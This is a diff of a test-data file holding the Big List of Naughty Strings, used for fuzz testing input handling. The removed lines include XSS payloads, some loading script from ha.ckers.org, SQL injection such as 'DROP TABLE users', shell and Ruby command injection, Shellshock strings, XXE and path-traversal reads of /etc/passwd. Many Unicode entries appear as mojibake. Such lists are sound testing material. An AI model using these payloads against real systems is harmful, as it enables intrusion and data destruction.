-"--><script>alert(123)</script>", -"\";alert(123);t=\"", -"';alert(123);t='", -"JavaSCript:alert(123)", -";alert(123);", -"src=JaVaSCript:prompt(132)", -"\"><script>alert(123);</script x=\"", -"'><script>alert(123);</script x='", -"><script>alert(123);</script x=", -"\" autofocus onkeyup=\"javascript:alert(123)", -"' autofocus onkeyup='javascript:alert(123)", -"<script\\x20type=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x09type=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>", -"'`\"><\\x3Cscript>javascript:alert(1)</script>", -"'`\"><\\x00script>javascript:alert(1)</script>", -"ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF", -"ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF", -"ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF", -"ABC<div 
style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF", -"<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Ajavascript:javascript:alert(1)\" 
id=\"fuzzelement1\">test</a>", -"<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a 
href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>", -"`\"'><img src=xxx:x 
\\x09onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>", -"\"`'><script>\\x3Bjavascript:alert(1)</script>", -"\"`'><script>\\x0Djavascript:alert(1)</script>", -"\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>", -"\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>", -"\"`'><script>\\x09javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>", -"\"`'><script>\\x00javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>", -"\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>", -"\"`'><script>\\x0Cjavascript:alert(1)</script>", -"\"`'><script>\\x2Bjavascript:alert(1)</script>", -"\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>", -"\"`'><script>-javascript:alert(1)</script>", -"\"`'><script>\\x0Ajavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>", -"\"`'><script>\\x7Ejavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>", -"\"`'><script>\\xC2\\x85javascript:alert(1)</script>", -"\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>", -"\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>", 
-"\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>", -"\"`'><script>\\x21javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>", -"\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>", -"\"`'><script>\\x0Bjavascript:alert(1)</script>", -"\"`'><script>\\x20javascript:alert(1)</script>", -"\"`'><script>\\xC2\\xA0javascript:alert(1)</script>", -"<img \\x00src=x onerror=\"alert(1)\">", -"<img \\x47src=x onerror=\"javascript:alert(1)\">", -"<img \\x11src=x onerror=\"javascript:alert(1)\">", -"<img \\x12src=x onerror=\"javascript:alert(1)\">", -"<img\\x47src=x onerror=\"javascript:alert(1)\">", -"<img\\x10src=x onerror=\"javascript:alert(1)\">", -"<img\\x13src=x onerror=\"javascript:alert(1)\">", -"<img\\x32src=x onerror=\"javascript:alert(1)\">", -"<img\\x47src=x onerror=\"javascript:alert(1)\">", -"<img\\x11src=x onerror=\"javascript:alert(1)\">", -"<img \\x47src=x onerror=\"javascript:alert(1)\">", -"<img \\x34src=x onerror=\"javascript:alert(1)\">", -"<img \\x39src=x onerror=\"javascript:alert(1)\">", -"<img \\x00src=x onerror=\"javascript:alert(1)\">", -"<img src\\x09=x onerror=\"javascript:alert(1)\">", -"<img src\\x10=x onerror=\"javascript:alert(1)\">", -"<img src\\x13=x onerror=\"javascript:alert(1)\">", -"<img src\\x32=x onerror=\"javascript:alert(1)\">", -"<img src\\x12=x onerror=\"javascript:alert(1)\">", -"<img src\\x11=x onerror=\"javascript:alert(1)\">", -"<img src\\x00=x onerror=\"javascript:alert(1)\">", -"<img src\\x47=x onerror=\"javascript:alert(1)\">", -"<img src=x\\x09onerror=\"javascript:alert(1)\">", -"<img src=x\\x10onerror=\"javascript:alert(1)\">", -"<img src=x\\x11onerror=\"javascript:alert(1)\">", -"<img src=x\\x12onerror=\"javascript:alert(1)\">", -"<img src=x\\x13onerror=\"javascript:alert(1)\">", -"<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">", -"<img src=x onerror=\\x09\"javascript:alert(1)\">", -"<img src=x 
onerror=\\x10\"javascript:alert(1)\">", -"<img src=x onerror=\\x11\"javascript:alert(1)\">", -"<img src=x onerror=\\x12\"javascript:alert(1)\">", -"<img src=x onerror=\\x32\"javascript:alert(1)\">", -"<img src=x onerror=\\x00\"javascript:alert(1)\">", -"<a href=javascript:javascript:alert(1)>XXX</a>", -"<img src=\"x` `<script>javascript:alert(1)</script>\"` `>", -"<img src onerror /\" '\"= alt=javascript:alert(1)//\">", -"<title onpropertychange=javascript:alert(1)></title><title title=>", -"<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">", -"<!--[if]><script>javascript:alert(1)</script -->", -"<!--[if<img src=x onerror=javascript:alert(1)//]> -->", -"<script src=\"/\%(jscript)s\"></script>", -"<script src=\"\\%(jscript)s\"></script>", -"<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", -"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", -"<IMG SRC=# onmouseover=\"alert('xxs')\">", -"<IMG SRC= onmouseover=\"alert('xxs')\">", -"<IMG onmouseover=\"alert('xxs')\">", -"<IMG SRC=javascript:alert('XSS')>", -"<IMG SRC=javascript:alert('XSS')>", -"<IMG SRC=javascript:alert('XSS')>", -"<IMG SRC=\"jav ascript:alert('XSS');\">", -"<IMG SRC=\"jav	ascript:alert('XSS');\">", -"<IMG SRC=\"jav
ascript:alert('XSS');\">", -"<IMG SRC=\"jav
ascript:alert('XSS');\">", -"perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out", -"<IMG SRC=\"  javascript:alert('XSS');\">", -"<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", -"<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", -"<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", -"<<SCRIPT>alert(\"XSS\");//<</SCRIPT>", -"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", -"<SCRIPT SRC=//ha.ckers.org/.j>", -"<IMG SRC=\"javascript:alert('XSS')\"", -"<iframe src=http://ha.ckers.org/scriptlet.html <", -"\\\";alert('XSS');//", -"<u oncopy=alert()> Copy me</u>", -"<i onwheel=alert(1)> Scroll over me </i>", -"<plaintext>", -"http://a/%%30%30", -"</textarea><script>alert(123)</script>", - -// SQL Injection -// -// Strings which can cause a SQL injection if inputs are not sanitized - -"1;DROP TABLE users", -"1'; DROP TABLE users-- 1", -"' OR 1=1 -- 1", -"' OR '1'='1", -" ", -"%", -"_", - -// Server Code Injection -// -// Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) - -"-", -"--", -"--version", -"--help", -"$USER", -"/dev/null; touch /tmp/blns.fail ; echo", -"`touch /tmp/blns.fail`", -"$(touch /tmp/blns.fail)", -"@{[system \"touch /tmp/blns.fail\"]}", - -// Command Injection (Ruby) -// -// Strings which can call system commands within Ruby/Rails applications - -"eval(\"puts 'hello world'\")", -"System(\"ls -al /\")", -"`ls -al /`", -"Kernel.exec(\"ls -al /\")", -"Kernel.exit(1)", -"%x('ls -al /')", - -// XXE Injection (XML) -// -// String which can reveal system files when parsed by a badly configured XML parser - -"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>", - -// Unwanted Interpolation -// -// Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. 
Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. - -"$HOME", -"$ENV{'HOME'}", -"%d", -"%s", -"{0}", -"%*.*s", -"File:///", - -// File Inclusion -// -// Strings which can cause user to pull in files that should not be a part of a web server - -"../../../../../../../../../../../etc/passwd%00", -"../../../../../../../../../../../etc/hosts", - -// Known CVEs and Vulnerabilities -// -// Strings that test for known vulnerabilities - -"() { 0; }; touch /tmp/blns.shellshock1.fail;", -"() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }", -"<<< %s(un='%s') = %u", -"+++ATH0", - -// MSDOS/Windows Special Filenames -// -// Strings which are reserved characters in MSDOS/Windows - -"CON", -"PRN", -"AUX", -"CLOCK$", -"NUL", -"A:", -"ZZ:", -"COM1", -"LPT1", -"LPT2", -"LPT3", -"COM2", -"COM3", -"COM4", - -// IRC specific strings -// -// Strings that may occur on IRC clients that make security products freak out - -"DCC SEND STARTKEYLOGGER 0 0 0", - -// Scunthorpe Problem -// -// Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) - -"Scunthorpe General Hospital", -"Penistone Community Church", -"Lightwater Country Park", -"Jimmy Clitheroe", -"Horniman Museum", -"shitake mushrooms", -"RomansInSussex.co.uk", -"http://www.cum.qc.ca/", -"Craig Cockburn, Software Specialist", -"Linda Callahan", -"Dr. Herman I. Libshitz", -"magna cum laude", -"Super Bowl XXX", -"medieval erection of parapets", -"evaluate", -"mocha", -"expression", -"Arsenal canal", -"classic", -"Tyson Gay", -"Dick Van Dyke", -"basement", - -// Human injection -// -// Strings which may cause human to reinterpret worldview - -"If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. 
Please wake up, we miss you.", - -// Terminal escape codes -// -// Strings which punish the fools who use cat/type on this file - -"Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue", -"But now...[20Cfor my greatest trick...[8m", -"The quick brown fox... [Beeeep]", - -// iOS Vulnerabilities -// -// Strings which crashed iMessage in various versions of iOS - -"Powerトマトマᄉムᄄマトマトᄉムᄄマᄆᄆヒ ¢ᆬᆪ ¢ᆬᆪh ¢ᆬᆪ ¢ᆬᆪ¥ニラ", -"゚マᄈ0゚フネᄌマ" -};
\ No newline at end of file + // sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt + + // Reserved Strings + // + // Strings which may be used elsewhere in code + + "undefined", "undef", "null", "NULL", "(null)", "nil", "NIL", "true", "false", "True", "False", "TRUE", "FALSE", "None", "hasOwnProperty", "\\", "\\\\", + + // Numeric Strings + // + // Strings which can be interpreted as numeric + + "0", "1", "1.00", "$1.00", "1/2", "1E2", "1E02", "1E+02", "-1", "-1.00", "-$1.00", "-1/2", "-1E2", "-1E02", "-1E+02", "1/0", "0/0", "-2147483648/-1", + "-9223372036854775808/-1", "-0", "-0.0", "+0", "+0.0", "0.00", "0..0", ".", "0.0.0", "0,00", "0,,0", ",", "0,0,0", "0.0/0", "1.0/0.0", "0.0/0.0", "1,0/0,0", + "0,0/0,0", "--1", "-", "-.", "-,", "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999", "NaN", "Infinity", + "-Infinity", "INF", "1#INF", "-1#IND", "1#QNAN", "1#SNAN", "1#IND", "0x0", "0xffffffff", "0xffffffffffffffff", "0xabad1dea", + "123456789012345678901234567890123456789", "1,000.00", "1 000.00", "1'000.00", "1,000,000.00", "1 000 000.00", "1'000'000.00", "1.000,00", "1 000,00", + "1'000,00", "1.000.000,00", "1 000 000,00", "1'000'000,00", "01000", "08", "09", "2.2250738585072011e-308", + + // Special Characters + // + // ASCII punctuation. All of these characters may need to be escaped in some + // contexts. Divided into three groups based on (US-layout) keyboard position. + + ",./;'[]\\-=", "<>?:\"{}|_+", "!@#$%^&*()`~", + + // Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, + // and U+007F (DEL) + // Often forbidden to appear in various text-based file formats (e.g. XML), + // or reused for internal delimiters on the theory that they should never + // appear in input. + // The next line may appear to be blank or mojibake in some viewers. + "", + + // Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. 
+ // Commonly misinterpreted as additional graphic characters. + // The next line may appear to be blank, mojibake, or dingbats in some viewers. + "ᅡタᅡチᅡツᅡテᅡトᅡニᅡヌᅡネᅡノᅡハᅡヒᅡフᅡヘᅡホᅡマᅡミᅡムᅡメᅡモᅡヤᅡユᅡヨᅡラᅡリᅡルᅡレᅡロᅡワᅡンᅡ゙ᅡ゚", + + // Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode + // version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), + // and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often + // treated as whitespace in some contexts. + // This file unfortunately cannot express strings containing + // U+0000, U+000A, or U+000D (NUL, LF, CR). + // The next line may appear to be blank or mojibake in some viewers. + // The next line may be flagged for \"trailing whitespace\" in some viewers. + " ", " ᅡナ £レタ¬タタ¬タチ¬タツ¬タテ¬タト¬タナ¬タニ¬タヌ¬タネ¬タノ¬タハ¬タヒ¬タᄄ¬タᄅ¬タᆵ¬チ゚ ̄タタ", + + // Unicode additional control characters: all of the characters with + // general category Cf (in Unicode 8.0.0). + // The next line may appear to be blank or mojibake in some viewers. + "ᅡᆳタチツテトナワᅴンᅵマ£ᅠホ¬タヒ¬タフ¬タヘ¬タホ¬タマ¬タᆰ¬タᆱ¬タᆲ¬タᆳ¬タᆴ¬チᅠ¬チᄀ¬チᄁ¬チᆪ¬チᄂ¬チᆭ¬チᄃ¬チᄄ¬チᄅ¬チᆰ¬チᆱ¬チᆲ¬チᆳ¬チᆴ¬チᆵᄏ" + "ᄍᄎᄏムツᄑロᄇᅠロᄇᄀロᄇᄁロᄇᆪンナᄈンナᄡンナᄉンナᄊンナᄋンナᄌンナᄍンナᄎᅠタチᅠタᅠᅠタᄀᅠタᄁᅠタᆪᅠタᄂᅠ" + "タᆬᅠタᆭᅠタᄃᅠタᄄᅠタᄅᅠタᆰᅠタᆱᅠタᆲᅠタᆳᅠタᆴᅠタᆵᅠタᄚᅠタᄆᅠタᄇᅠタᄈᅠタᄡᅠタᄉᅠタᄊᅠタᄋᅠタᄌ" + "ᅠタᄍᅠタᄎᅠタᄏᅠタᄐᅠタᄑᅠタᄒᅠタᅠチタᅠチチᅠチツᅠチテᅠチトᅠチナᅠチニᅠチヌᅠチネᅠチノᅠチハᅠチヒ" + "ᅠチフᅠチヘᅠチホᅠチマᅠチミᅠチムᅠチメᅠチモᅠチヤᅠチユᅠチヨᅠチラᅠチリᅠチルᅠチレᅠチロᅠチワᅠチンᅠヂ" + "ᅠチ゚ᅠチᅠᅠチᄀᅠチᄁᅠチᆪᅠチᄂᅠチᆬᅠチᆭᅠチᄃᅠチᄄᅠチᄅᅠチᆰᅠチᆱᅠチᆲᅠチᆳᅠチᆴᅠチᆵᅠチᄚᅠチᄆ" + "ᅠチᄇᅠチᄈᅠチᄡᅠチᄉᅠチᄊᅠチᄋᅠチᄌᅠチᄍᅠチᄎᅠチᄏᅠチᄐᅠチᄑᅠチᄒᅠチ" + "", + + // \"Byte order marks\", U+FEFF and U+FFFE, each on its own line. + // The next two lines may appear to be blank or mojibake in some viewers. + "ᄏ", "ᄒ", + + // Unicode Symbols + // + // Strings which contain common unicode symbols (e.g. 
smart quotes) + + "ᅫᄅ¬ノネᅢᄃ¬ネレ¬ネᆱᅨワᅡᄉ¬ノᄂ¬ノᆬᅢᄋ", "ᅢᆬᅢ゚¬ネツᅥメᅡ례ル¬ネニᅨレᅡᆲ¬タᆭᅢᆭ", "ᅤモ¬ネムᅡᄡᅡᆴ¬タᅠᅡᆬᅡ뗴ニᅢ죄タ¬タワ¬タリ", + "ᅡᄀ¬ト깏ᅡᄁ¬ネ゙ᅡ다ᄊ¬タ깕ᅡᄎ¬タモ¬ノᅠ", + "ᅡ졔ロᅢヌ¬ラハᅣ몌ワᅢツᅡᆵᅨリᅡ", "ᅢナᅢヘᅢホᅢマᅨンᅢモᅢヤᆪᅢメᅢレᅢニ¬リテ", + "ᅤメ¬ダᅡᄡ¬タᄚᅨヌᅢチᅡ뗴ニᅢリ¬ネマ¬タン¬タル", "`¬チト¬ツᆲ¬タᄍ¬タᄎᆲチᆲツ¬タ가ᄚᅡᄋ¬タレ¬タヤᅡᄆ", + "¬ナロ¬ナワ¬ナン¬ナ゙", + "チツテトナニヌネノハヒフヘホマミムメモヤユヨラリルレロワン゙゚ᅠᄀᄁᆪᄂᆬᆭ" + "ᄃᄄᄅᆰᆱᆲᆳᆴᆵᄚᄆᄇᄈᄡᄉᄊᄋᄌᄍᄎᄏᄐᄑᄒタチツテトナニヌネノハヒフ" + "ヘホマ", + "ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅ", + + // Unicode Subscript/Superscript/Accents + // + // Strings which contain unicode subscripts/superscripts; can cause rendering issues + + "¬チᄚ¬チᄡ¬チᄉ", "¬ツタ¬ツチ¬ツツ", "¬チᄚ¬チᄡ¬チᄉ¬ツタ¬ツチ¬ツツ", + "¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢" + "ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ" + "¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ " + "¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢" + "ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ" + "¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ " + 